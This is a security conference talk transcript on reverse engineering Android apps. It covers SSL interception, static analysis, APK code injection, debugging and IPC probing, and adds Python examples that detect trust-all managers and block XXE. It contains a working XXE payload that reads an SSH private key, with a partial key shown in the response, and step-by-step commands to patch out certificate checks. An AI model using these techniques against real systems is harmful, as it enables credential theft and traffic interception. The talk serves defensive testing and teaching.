How We Tear into that Little Green Man by Mathew Rowley
 

    Presentation Transcript

    • A blackhat’s toolchest: How we tear into that little green man
      Wednesday, June 20, 12
    • Who is you?! Mathew Rowley (@wuntee), Senior security consultant at Matasano
    • Agenda
    • wuntee?
    • Quick background
      • APK - Android PacKage
      • This is what is downloaded when you install an app
      • file: Zip archive data, at least v2.0 to extract
      • classes.dex - Dalvik bytecode
      • AndroidManifest.xml - Provides OS information about the application
    • Quick background
      • Smali/Baksmali
      • smali/baksmali is an assembler/disassembler for the dex format used by Dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.)
      • Set of tools that you can decompile Android applications with, then re-compile them.
    • Tools Mentioned
      • Otertool - Tool I wrote
      • apktool - smali/baksmali wrapper
      • Mercury - Tool to interact with IPC locally
      • Eclipse - Java IDE, includes Java debugger
      • JD-GUI - Java decompiler
      • dex2jar - Converts a dex file to a jar file
    • technique numero uno: MITM
    • SSL
      • By default SSL certificate checking is performed by the Android OS
      • Optionally, developers can add or override those checks with their own
      • This presents two problems when attempting to MITM an SSL communication stream
    • Circumventing OS checks
      • Install the CA.
      • There is no interface for doing this.
      • Demos...
    • For reference. But it must be easier...
        $ cd $JAVA_HOME/lib/ext
        $ sudo wget http://www.bouncycastle.org/download/bcprov-jdk15on-147.jar
        $ cd -
        $ adb pull /system/etc/security/cacerts.bks
        $ keytool -keystore cacerts.bks -storetype BKS -provider org.bouncycastle.jce.provider.BouncyCastleProvider -storepass changeit -importcert -trustcacerts -alias idontcare -file ca.cer
        $ adb shell mount | grep system
        $ adb shell mount -o remount,rw /dev/block/mtdblock0 /system
        $ adb shell chmod 777 /system/etc/security/cacerts.bks
        $ adb push cacerts.bks /system/etc/security/cacerts.bks
        $ adb shell chmod 644 /system/etc/security/cacerts.bks
    • Caveats
      • Emulator
        • Does not persist changes to the .img file. Bug reported, was supposed to be fixed in r17
        • Can be done with unyaffs/mkyaffs2image
      • Ice Cream Sandwich
        • Switched from BouncyCastle to a directory of X.509 text certificates
    • Circumventing custom developer certificate checks
      • This is done by extending X509TrustManager
      • (void) checkServerTrusted(...)
      • Modify APK using baksmali, re-smali, re-package, re-sign
      • Time intensive
      • No interface
      • Demos...
    • For Reference. But it must be easier...
        $ java -jar apktool.jar d X509ModifiedSSL.apk
        $ grep -ri x509 * | grep -i implements
        -- Edit file to have checkServerTrusted return void
        $ java -jar apktool.jar b X509ModifiedSSL X509ModifiedSSL-mod.apk
        $ keytool -genkey -v -keystore keystore.ks -alias idontcare -keyalg RSA -keysize 2048 -validity 10000
        $ jarsigner -keystore keystore.ks X509ModifiedSSL-mod.apk idontcare
        $ adb install X509ModifiedSSL-mod.apk
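The same grep-for-X509TrustManager step works from the reviewer's side: a checkServerTrusted that only returns void is exactly what a code audit of baksmali output should flag. Added example in Python (not from the talk or from otertool); the two smali snippets and the class names in them are constructed, the smali directives and instructions are real syntax.

```python
import re

# baksmali directives and instructions matched below are real smali syntax.
CLASS_RE = re.compile(r"^\.class\b[^\n]*?(L[^\s;]+;)", re.MULTILINE)
IMPLEMENTS_TM_RE = re.compile(r"^\.implements Ljavax/net/ssl/X509TrustManager;", re.MULTILINE)
METHOD_RE = re.compile(r"^\.method\b[^\n]*\bcheckServerTrusted\([^\n]*\n(.*?)^\.end method",
                       re.MULTILINE | re.DOTALL)


def audit_trust_manager(smali: str) -> dict:
    """Map class name -> 'TRUST-ALL' or 'VALIDATES' for an X509TrustManager in one .smali file.

    A checkServerTrusted body with neither an invoke-* nor a throw cannot be checking the
    chain: that is the 'return void' pattern. Anything else still deserves a manual look.
    """
    cls = CLASS_RE.search(smali)
    if cls is None or IMPLEMENTS_TM_RE.search(smali) is None:
        return {}
    verdicts = {}
    for m in METHOD_RE.finditer(smali):
        # Keep instructions only: drop directives (.locals, .param, .prologue ...) and blanks.
        ops = [ln.strip() for ln in m.group(1).splitlines()
               if ln.strip() and not ln.strip().startswith(".")]
        active = any(op.startswith(("invoke-", "throw")) for op in ops)
        verdicts[cls.group(1)] = "VALIDATES" if active else "TRUST-ALL"
    return verdicts


# Constructed sample: the classic accept-everything trust manager.
TRUST_ALL = """\
.class public Lcom/example/app/TrustAllManager;
.super Ljava/lang/Object;
.implements Ljavax/net/ssl/X509TrustManager;
.method public checkServerTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    .locals 0
    return-void
.end method
"""

# Constructed sample: a wrapper that hands the chain to the platform trust manager.
DELEGATING = """\
.class public Lcom/example/app/PinningManager;
.super Ljava/lang/Object;
.implements Ljavax/net/ssl/X509TrustManager;
.method public checkServerTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    .locals 1
    iget-object v0, p0, Lcom/example/app/PinningManager;->delegate:Ljavax/net/ssl/X509TrustManager;
    invoke-interface {v0, p1, p2}, Ljavax/net/ssl/X509TrustManager;->checkServerTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    return-void
.end method
"""
```

Run audit_trust_manager over every .smali file apktool produced to get a list of classes that need a second look before signing off on an app's TLS handling.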
    • I have SSL MITM, now what?
      • This will typically be used to attack backend infrastructure, not the device
      • Backend servers typically expect sanitized input, and don't expect non-device interaction.
      • What I have seen:
        • 101 read/write of arbitrary files through SOAP interface
        • XML entity inclusion to gain access to private ssh key
        • Ability to arbitrarily lock/wipe another person's device
    • XML Entity inclusion in CRM application
    • XML entity inclusion: Malicious request
        <!DOCTYPE foo [<!ENTITY gimme SYSTEM "file:///home/admin/.ssh/id_rsa"> ]>
        <DeviceRequest>
          <Header>
            <ClientId>Android&gimme;</ClientId>
            <UserId>mathew</UserId>
            <Token></Token>
            <RequestId>07/07/2011 07:07:07 AM</RequestId>
            <TransactionName>ANY-EVENT</TransactionName>
          </Header>
          <Body></Body>
        </DeviceRequest>
    • XML entity inclusion: Response
        <?xml version="1.0" encoding="UTF-8"?>
        <DeviceResponse>
          <Header>
            <ClientId>
            Android-----BEGIN RSA PRIVATE KEY-----
            MIIEowIBAAKCAQEAztSmfJBDtIUAubiYuOniQ6BomBBbsoZPLKLM75qWZ5VoVyoV
            …
            TSN3IA6UYyfCQs2VCU5Go197Hw+hxoNqovE+bGAUO9RYhUfoehCHdAUDRAu8H8oU
            Ts/0C+walTrXRPRozQUk3h6UDcAo42KLybuxufZWTn/XQ2/nVVwv==
            -----END RSA PRIVATE KEY-----
            </ClientId>
            ...
    • XML entity inclusion
      • Files pulled to obtain ssh key:
        • /etc/passwd
        • /opt/apache/crm/
        • /opt/apache/crm/bin
        • /opt/apache/crm/bin/start-crm.sh - starts as admin
        • /home/admin/.ssh/id_rsa
      • Think that private key was used anywhere else?
    • Conclusion/Prevention
      • Conclusion
        • Arbitrary filesystem access as admin user
        • Remote access to server
      • Prevention
        • Do not trust application input!
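What "do not trust application input" looks like for the DeviceRequest format above, as an added Python example (not from the talk or the CRM in question): refuse any DTD before a parser sees it, parse strictly, and whitelist the ClientId value the backend echoes back so it can never carry a file body. The CLIENT_ID_RE format and the REQUIRED field set are assumptions about this backend; both request bodies are constructed from the slide.

```python
import re
import xml.etree.ElementTree as ET

# Constructed requests in the DeviceRequest shape from the slides: one benign, one with the entity trick.
BENIGN = b"""<DeviceRequest><Header><ClientId>Android</ClientId><UserId>mathew</UserId>
<Token></Token><RequestId>07/07/2011 07:07:07 AM</RequestId>
<TransactionName>ANY-EVENT</TransactionName></Header><Body></Body></DeviceRequest>"""
MALICIOUS = b"""<!DOCTYPE foo [<!ENTITY gimme SYSTEM "file:///home/admin/.ssh/id_rsa"> ]>
<DeviceRequest><Header><ClientId>Android&gimme;</ClientId><UserId>mathew</UserId>
<Token></Token><RequestId>07/07/2011 07:07:07 AM</RequestId>
<TransactionName>ANY-EVENT</TransactionName></Header><Body></Body></DeviceRequest>"""

DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)
CLIENT_ID_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")   # assumed format for this backend
REQUIRED = ("ClientId", "UserId", "Token", "RequestId", "TransactionName")  # assumed


class RejectedRequest(ValueError):
    """Raised for anything a legitimate device client would never send."""


def parse_device_request(raw: bytes) -> dict:
    # 1. A device client never needs a DTD: refuse the document before any parser sees it.
    if DTD_RE.search(raw):
        raise RejectedRequest("DOCTYPE/ENTITY declaration not allowed")
    # 2. Parse strictly; ElementTree (expat) does not fetch external entities on its own.
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        raise RejectedRequest(f"malformed XML: {exc}") from exc
    header = root.find("Header")
    if root.tag != "DeviceRequest" or header is None:
        raise RejectedRequest("unexpected document structure")
    fields = {child.tag: (child.text or "").strip() for child in header}
    if any(name not in fields for name in REQUIRED):
        raise RejectedRequest("missing header field")
    # 3. Whitelist the value the server echoes back, so it can never carry a file body.
    if not CLIENT_ID_RE.match(fields["ClientId"]):
        raise RejectedRequest("ClientId fails whitelist")
    return fields


def accepts(raw: bytes) -> bool:
    """True if the request passes every check, False if it was rejected."""
    try:
        parse_device_request(raw)
        return True
    except RejectedRequest:
        return False
```

Logging each RejectedRequest with the client address gives the backend team a cheap detection signal for exactly the probing shown on the previous slides.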
    • technique numero dos: Static analysis
    • Setup
      • unzip -> unzip directory
      • baksmali -> unapk directory
      • dex2jar -> jar directory
      • JD-GUI -> src directory
    • Reference Script
        #!/bin/bash
        # Scripts
        apktool="/Applications/hacking/apktool-install-macosx-r04-brut1/apktool"
        dex2jar="/Applications/hacking/dex2jar-0.0.9.7/dex2jar.sh"
        jdgui="/Applications/JD-GUI.app/Contents/MacOS/jd-gui"
        apk=$1
        mkdir jar src unapk unzip
        # Unzip
        pushd unzip
        unzip ../$apk
        popd
        # Unapk
        pushd unapk
        $apktool d -f ../$apk .
        popd
        # Get jar
        $dex2jar $apk
        mv *.jar ./jar
        # Decompile
        $jdgui jar/*.jar
    • Example: Skype's hidden menu
      • Logcat... What is skype.properties?
    • Obfuscation
      • Default configurations for Eclipse projects
      • Commercial products
      • Makes things a lot harder to reverse
      • Skype is aggressively obfuscated.
    • Locate string “skype.properties”
      • grep is your friend
      • Notice how it is only located in .smali files
      • What about .java?
    • skype.properties processing
        login=Boolean
        daemon=Boolean
        update=Boolean
        answer=Boolean
        callVoiceMailDelay=Integer
        videoQualityLow=Integer
        userWantsVideo=Boolean
        checkSharedXML=Boolean
        kit.logging=Boolean
        debugMenu=Boolean
        test.monkey.enabled=Boolean
        test.acs.enabled=Boolean
        test.video=Boolean
        test.skypename=String
        test.password=String
        videoInfo=String
    • The test...
      • Create skype.properties with “debugMenu=1” and place it on SD card
    • Logging...
    • HackersChallenge...
    • HackersChallenge...
      • Challenge for Matasano coworkers - nobody has completed (attempted?) it
      • “Tamper proof” by sending a custom hash of itself with every request
      • Performs an HTTPS request to get a “secret” of a character from the movie Hackers, then displays it
      • Goal is to figure out everyone's secret
    • technique numero tres: Modifying an application
    • Injecting Java source to APK
      • Dalvik bytecode can be decompiled to smali, modified and recompiled...
      • Arbitrary Java can be compiled into Dalvik bytecode
      • Combine the two, you can insert arbitrary Java into an APK...
      • Things you must know when modifying
        • Smali code from custom Java
        • Calling convention of Smali
      • Demo - modify HackersChallenge to log custom hash value
    • So what?
      • Simple example of injecting arbitrary Java into an Android application
      • Malware?
      • Debugging obfuscation?
      • Control circumvention aka “cracks”?
      • You can inject any Java source into ANY application!
    • technique numero quatro: Debugging applications without source
    • Debugging
      • System.out.println(debug_info) or attach to a debugger?
      • Android applications are debugged via the typical Java Platform Debug Architecture (JPDA)
      • Interacting with an Android application
        • Eclipse - GUI
        • JDB - command line
        • Java JPDA API
        • Ruby/JRuby with jdi-hook
      • Caveats
        • You need to know “where” you must breakpoint
      • Benefits
        • See method arguments and return values
      • HackersChallenge?
      • Demo - debug HackersChallenge to view custom hash value
    • Ok... And?
      • Debugging is a key reversing concept
      • Relate this to debugging using GDB or ImmunityDebugger/OllyDbg
      • Not only can you break on local methods, but you can on core Android methods as well. Ever want to see all IPC?
      • Break: android.content.Intent.<init>
    • technique numero cinco: Exploiting IPC
    • Exploiting IPC
      • An application with 0 extra privileges can do MUCH more than you think...
      • Open IPC channels can act as a proxy for extra functionality
      • Mercury: https://media.blackhat.com/bh-eu-12/Erasmus/bh-eu-12-Erasmus-Heavy-Metal_Poisoned_Droid-Slides.pdf
        $ for x in `find . -name '*.apk'`; do aapt=`aapt d xmltree $x AndroidManifest.xml`; prov=`echo $aapt | grep -A3 "E: provider"`; if [ "$prov" != "" ]; then echo $x; fi; done | wc -l
        64
    • otertool
    • Live File Browser sqlite/text/hex
    • FSDiff
    • Java to Smali
    • Visual AndroidManifest.xml
    • Future of Otertool
      • Automated debugger functionality
        • Show all calls/args to method x
        • Show all variables in method before return
      • Handle AndroidManifest.xml file and other resources
      • Feature suggestions, bugs? -> GitHub
    • Questions?
      mathew rowley @wuntee mathew@matasano.com
      otertool current release: https://github.com/wuntee/otertool/tree/master/release/current
      videos/slides: http://67.219.122.21/shakacon/